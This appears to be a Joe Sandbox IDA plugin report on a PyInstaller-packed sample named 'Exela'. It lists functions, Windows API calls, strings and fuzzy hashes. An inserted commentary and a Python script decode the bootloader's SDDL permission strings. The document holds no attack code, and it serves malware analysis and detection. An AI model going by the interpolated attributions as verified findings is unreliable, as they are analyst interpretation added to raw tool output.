                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
                                                                                                    • Instruction ID: ac07e26ee97088d2eaade3e0b7c6704b1d9fdec79bbd64e4776d29d5b95a4315
                                                                                                    • Opcode Fuzzy Hash: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
                                                                                                    • Instruction Fuzzy Hash: BDC1B4229087A691F760BB15944A2BDB794FF81B80FDD41B1EA4E07791CF7CEC558720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                    • String ID:
                                                                                                    • API String ID: 995526605-0
                                                                                                    • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                    • Instruction ID: be20ff680414a40a1c3a2d888350e2a7261b9c047fb7ca64d6808bbd15c4e803
                                                                                                    • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                    • Instruction Fuzzy Hash: 90218D21A0C75686FB20BB55B45563AE7A0EF817B0F984275EAAC43AF4DE6CD8448720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF75AE98760: GetCurrentProcess.KERNEL32 ref: 00007FF75AE98780
                                                                                                      • Part of subcall function 00007FF75AE98760: OpenProcessToken.ADVAPI32 ref: 00007FF75AE98793
                                                                                                      • Part of subcall function 00007FF75AE98760: GetTokenInformation.KERNELBASE ref: 00007FF75AE987B8
                                                                                                      • Part of subcall function 00007FF75AE98760: GetLastError.KERNEL32 ref: 00007FF75AE987C2
                                                                                                      • Part of subcall function 00007FF75AE98760: GetTokenInformation.KERNELBASE ref: 00007FF75AE98802
                                                                                                      • Part of subcall function 00007FF75AE98760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF75AE9881E
                                                                                                      • Part of subcall function 00007FF75AE98760: CloseHandle.KERNEL32 ref: 00007FF75AE98836
                                                                                                    • LocalFree.KERNEL32(?,00007FF75AE93C55), ref: 00007FF75AE9916C
                                                                                                    • LocalFree.KERNEL32(?,00007FF75AE93C55), ref: 00007FF75AE99175
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                    • API String ID: 6828938-1529539262
                                                                                                    • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                    • Instruction ID: 4e7f5d265aa20896c0918edc79173f9221289376d1e535c219868d27e5422382
                                                                                                    • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                    • Instruction Fuzzy Hash: 04218221A0875689FB10BB21E55A7EAA364FF88780FC840B1EA4D53796DF3CD8058760
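The String ID of the function above deserves a second look when triaging this report. D:(A;;FA;;;%s), D:(A;;FA;;;%s)(A;;FA;;;%s) and S-1-3-4 are SDDL security-descriptor format strings, and PYI_PATH_MAX is a PyInstaller bootloader constant. Together with the token and SID APIs summarised in the API ID (consistent with OpenProcessToken, GetTokenInformation, ConvertSidToStringSid, LocalFree, CloseHandle), this points to the bootloader routine that creates its temporary extraction directory with a DACL granting FILE_ALL_ACCESS only to the current user's SID and to the OWNER RIGHTS well-known SID S-1-3-4, rather than to stealer-specific logic; the CRT and startup-lock functions listed after it are bootloader boilerplate for the same reason. The Python below is an added example, not code from the report, from Joe Sandbox or from the sample: it fills those format strings the way a C sprintf would and decodes the resulting DACL so the effective grants are visible. The user SID, and the subset of well-known SIDs and rights mnemonics, are constructed for the example from Microsoft's documented SDDL syntax.

```python
"""Decode the SDDL DACL format strings recovered from the bootloader function.

Added example for this report; it is not code from Joe Sandbox or from the
analysed sample. The SDDL grammar and the well-known SID / rights tables
follow Microsoft's documented SDDL syntax; the user SID below is constructed.
"""
import re

# Format strings exactly as they appear in the String ID above; the native code
# fills the %s placeholders with SIDs (sprintf-style).
SDDL_FORMATS = (
    "D:(A;;FA;;;%s)",
    "D:(A;;FA;;;%s)(A;;FA;;;%s)",
)
OWNER_RIGHTS_SID = "S-1-3-4"   # third string in the String ID: OWNER RIGHTS
SAMPLE_USER_SID = "S-1-5-21-1004336348-1177238915-682003330-1001"  # constructed

# Subset of well-known SIDs and SDDL mnemonics (documented values).
WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-3-0": "CREATOR OWNER",
    "S-1-3-4": "OWNER RIGHTS",
    "S-1-5-18": "LOCAL SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
RIGHTS = {
    "FA": 0x001F01FF,  # FILE_ALL_ACCESS
    "FR": 0x00120089,  # FILE_GENERIC_READ
    "FW": 0x00120116,  # FILE_GENERIC_WRITE
    "FX": 0x001200A0,  # FILE_GENERIC_EXECUTE
    "GA": 0x10000000,  # GENERIC_ALL
    "GR": 0x80000000,  # GENERIC_READ
    "GW": 0x40000000,  # GENERIC_WRITE
    "GX": 0x20000000,  # GENERIC_EXECUTE
}

DACL_RE = re.compile(r"D:([A-Z]*)((?:\([^()]*\))*)")
ACE_RE = re.compile(r"\(([^()]*)\)")


def build_descriptor(fmt, *sids):
    """Fill the %s placeholders the way the bootloader's sprintf call does."""
    return fmt % sids


def parse_rights(field):
    """Return (access mask, mnemonics) for an SDDL rights field."""
    if field.lower().startswith("0x"):
        return int(field, 16), [field]
    mask, names = 0, []
    for i in range(0, len(field), 2):   # SDDL rights are two-letter codes
        code = field[i:i + 2]
        if code not in RIGHTS:
            raise ValueError(f"unsupported SDDL right {code!r}")
        mask |= RIGHTS[code]
        names.append(code)
    return mask, names


def parse_dacl(sddl):
    """Parse the D: component of an SDDL string into its flags and ACEs."""
    m = DACL_RE.search(sddl)
    if not m:
        raise ValueError("SDDL string has no DACL component")
    aces = []
    for body in ACE_RE.findall(m.group(2)):
        fields = body.split(";")
        if len(fields) != 6:   # type;flags;rights;object_guid;inherit_guid;sid
            raise ValueError(f"malformed ACE {body!r}")
        ace_type, ace_flags, rights, _obj, _inh, sid = fields
        mask, names = parse_rights(rights)
        aces.append({
            "type": ACE_TYPES.get(ace_type, ace_type),
            "flags": ace_flags,
            "mask": mask,
            "rights": names,
            "sid": sid,
            "account": WELL_KNOWN_SIDS.get(sid, "(domain/user SID)"),
        })
    return {"dacl_flags": m.group(1), "aces": aces}


def full_access_limited_to(sddl, allowed_sids):
    """True if every ACE is an allow of FILE_ALL_ACCESS to one of allowed_sids
    and nobody else is granted anything (an empty DACL denies everyone)."""
    aces = parse_dacl(sddl)["aces"]
    return bool(aces) and all(
        a["type"] == "ACCESS_ALLOWED"
        and a["mask"] == RIGHTS["FA"]
        and a["sid"] in set(allowed_sids)
        for a in aces
    )


def describe(sddl):
    """Human-readable one-liners for each ACE, for use in analysis notes."""
    return [
        f'{a["type"]} {"+".join(a["rights"])} (0x{a["mask"]:08X}) -> {a["sid"]} {a["account"]}'
        for a in parse_dacl(sddl)["aces"]
    ]


if __name__ == "__main__":
    for fmt in SDDL_FORMATS:
        sids = (SAMPLE_USER_SID, OWNER_RIGHTS_SID)[: fmt.count("%s")]
        sddl = build_descriptor(fmt, *sids)
        print(sddl)
        for line in describe(sddl):
            print("   ", line)
        print("    restricted to user+owner:",
              full_access_limited_to(sddl, {SAMPLE_USER_SID, OWNER_RIGHTS_SID}))
```

Because the DACL carries only allow ACEs for the user SID and OWNER RIGHTS, the unpacked payload directory is not readable by other local accounts; that is a property of the packer, not an evasion feature of the stealer, and the same fuzzy hashes will match any PyInstaller-built binary of the same bootloader version.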
APIs
• CreateDirectoryW.KERNELBASE(00000000,?,00007FF75AE9352C,?,00000000,00007FF75AE93F23), ref: 00007FF75AE97F22
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: CreateDirectory
• String ID: %.*s$%s%c$\
• API String ID: 4241100979-1685191245
• Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
• Instruction ID: dd085833ae2f05d1ae0ac13684e8d97cda65f1ae91378401cd904a5af3ab2d01
• Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
• Instruction Fuzzy Hash: 6531D621619BD549FB21BB20A852BEAA354EF84BE4F880270EE6D437C9DE2CD6458710
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75AEACFBB), ref: 00007FF75AEAD0EC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75AEACFBB), ref: 00007FF75AEAD177
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction ID: 66e33b65c9d276d9da9fc486a93bc7c2f23f94217e81deb88309e111fece70b2
• Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
• Instruction Fuzzy Hash: BC91C672F1866189F750BF65948A3BDABA0EF54B88F9C41B9DE0E57684CE38D442C730
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
• Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
• Instruction ID: af05e71ef9e4618fa9eab05f9e849d0bbcaf2a687110582b9dfdf8ffbd08dd8c
• Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
• Instruction Fuzzy Hash: 4E510B73F042218AFB14FF24D96A6BCA7A1AF40358F984275DD1E52AE5DF38A402C710
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 6433626fc0a770ba4f6d83c09f3326f67990d509dea1b3a303c7df294cc1bd66
• Instruction ID: d246f313e1b196996d780b106dff7ea72baf14baad370b1b14def19028b6aeb0
• Opcode Fuzzy Hash: 6433626fc0a770ba4f6d83c09f3326f67990d509dea1b3a303c7df294cc1bd66
• Instruction Fuzzy Hash: CF51AD22E087618AFB10FF71D45A3BDA3A1BF48B58F988575DE0D5B688DF38D4428720
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
• Instruction ID: 1b27b1b376e12331efcd963d3d0276092d520de5a1136c021d3708d197bb6d75
• Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
• Instruction Fuzzy Hash: E341C422D1879283F350BB20961A379A360FF94764F549375EA9C03AD2DF7CA5E18720
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction ID: 44aaf1e4e1737e217bb3da66a54c00683d13b118261384aea55578a273af45da
• Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction Fuzzy Hash: CD313B21E083734DFA64BB259467BB9A791AF81384FCC44B4D94E672D3DE2CA805C271
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
• Instruction ID: fea1776a34e1a753359ab11cf083ecdcdcffef3678773178f7f852b2f1373dec
• Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
• Instruction Fuzzy Hash: 6DD09210B1876A42FB183B745C9F17DA255AF48B41F9C55F9C80B0A3A3ED7CA8498320
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
• Instruction ID: d606099b4e6e67df70ef816ca1599a51ed9bd395bbdcec814ad5e0d787070884
• Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
• Instruction Fuzzy Hash: 35512821B0926246F766BE29940A67AE3C1AF44BA4F9C4774DE6D077C6CF3CD5018630
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
• Instruction ID: 6d79647a6174d8ed0cfcc5369f20650a4ce3914ca626938b546aec1e19bdeabb
• Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
• Instruction Fuzzy Hash: 2C110461718B6181EA10BB65A809069A361FF81BF4F9C4371EE7D4B7D8CE3CD4018700
APIs
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75AEA58A9), ref: 00007FF75AEA59C7
• SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75AEA58A9), ref: 00007FF75AEA59DD
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: Time$System$FileLocalSpecific
• String ID:
• API String ID: 1707611234-0
• Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
• Instruction ID: b6d72656a81f60ed81c0595009102228537d794fc3ae94f5c70c479b3c85ebab
• Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
• Instruction Fuzzy Hash: 36118F3261C72282FB54BB11A45613AF760FF84761F940275EAAD859E8EF6CD415CB20
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 485612231-0
                                                                                                    • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                    • Instruction ID: 3ba9d389facac25f79b385da1513dc1d9f226e2729bddc8d2a4f4d0838436265
                                                                                                    • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                    • Instruction Fuzzy Hash: 6EE04F50E0831642FF187BB2A45B13891906F84741B8C81B4C91D462A1DE2C68858220
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(?,?,?,00007FF75AEAAA45,?,?,00000000,00007FF75AEAAAFA), ref: 00007FF75AEAAC36
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEAAA45,?,?,00000000,00007FF75AEAAAFA), ref: 00007FF75AEAAC40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 918212764-0
                                                                                                    • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                    • Instruction ID: 477d21ec7612bd668772126a739409cb2da3a58a0e2e06d1601d3fed8709d5b9
                                                                                                    • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                    • Instruction Fuzzy Hash: 3121A821F1C76242FFA47761A45B27D96829F84790FCC42B9EA2E477D1CE6CE4858320
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
